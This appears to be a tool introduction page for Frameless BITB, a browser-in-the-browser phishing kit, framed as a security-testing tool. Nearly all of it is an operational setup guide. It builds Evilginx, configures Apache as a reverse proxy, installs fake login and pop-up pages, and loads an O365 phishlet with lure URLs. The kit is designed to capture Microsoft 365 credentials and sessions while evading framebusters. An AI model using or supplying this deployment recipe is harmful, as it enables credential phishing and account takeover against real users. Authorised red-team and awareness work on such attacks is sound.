About Frameless BITB
Frameless BITB is a BitB (browser-in-the-browser) security testing tool that researchers can use to run BitB security tests against target web applications and so help improve their security.
The tool does not use iframes and can bypass traditional framebuster techniques, such as the framebusters Microsoft implements on its login pages.
Tool Requirements:
Virtual machine (VM)
Go
Evilginx
Apache2
Phishlet
Lure
Tool download and configuration
Evilginx configuration
Visit https://help.evilginx.com/docs/intro to download and build the latest version of Evilginx.
Then copy the downloaded Evilginx to "/home/evilginx".
Visit https://go.dev/doc/install to download and install the latest version of Go:
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
Add the following line to the profile file:
export PATH=$PATH:/usr/local/go/bin
Then reload the profile:
source ~/.profile
Verify the installation:
go version
Install make:
sudo apt install make
Build:
cd /home/evilginx/evilginx2
make
Create a new directory for the Evilginx build, phishlets and redirectors:
mkdir /home/evilginx/evilginx
Copy the Evilginx build, phishlets and redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
Quick fix for the Ubuntu firewall (this grants the Evilginx binary the capability to bind to privileged ports):
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
On Ubuntu, if you encounter the "Failed to start nameserver on: :53" error, you can try modifying the following file:
sudo nano /etc/systemd/resolved.conf
Edit or add the DNSStubListener setting so that it reads DNSStubListener=no.
Then run the following command:
sudo systemctl restart systemd-resolved
Modify the Evilginx configuration
nano ~/.evilginx/config.json
Change https_port from 443 to 8443.
Install Apache2 and enable Mods
Install Apache2:
sudo apt install apache2 -y
Enable the Apache2 mods:
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Start Apache and enable it at boot:
sudo systemctl start apache2
sudo systemctl enable apache2
At this point, you can confirm that Apache and the VM are running by visiting the VM's IP address in a browser.
Frameless BITB download
Install Git:
sudo apt -y install git
Then use the following command to clone the project source code locally:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Apache custom pages
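Create the following three directories: home holds the home page, primary holds the login page (background), and secondary holds the BitB window (foreground):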
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Copy each page directory:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Delete the default Apache page:
sudo rm -r /var/www/html/
Copy the O365 phishlet to the phishlets directory:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
Running the tool
Install tmux and launch Evilginx in developer mode:
sudo apt install tmux -y
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
Evilginx Configuration:
config domain fake.com
config ipv4 127.0.0.1
Note that the Evilginx blacklist mode should be set to NoAdd so that Apache itself is not blacklisted, because all traffic reaches Evilginx through Apache:
blacklist noadd
Set up the phishlet and lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Open your browser and visit the lure URL.
Tool use
Tool demo video
Tool introduction: https://www.youtube.com/watch?v=p1opa2wnRvg
Demo: https://youtu.be/luJjxpEwVHI
License Agreement
The development and release of this project is under an open source license.
Project address
Frameless BITB: https://github.com/waelmas/frameless-bitb
Resources
https://janbakker.tech/evilginx-resources-for-microsoft-365/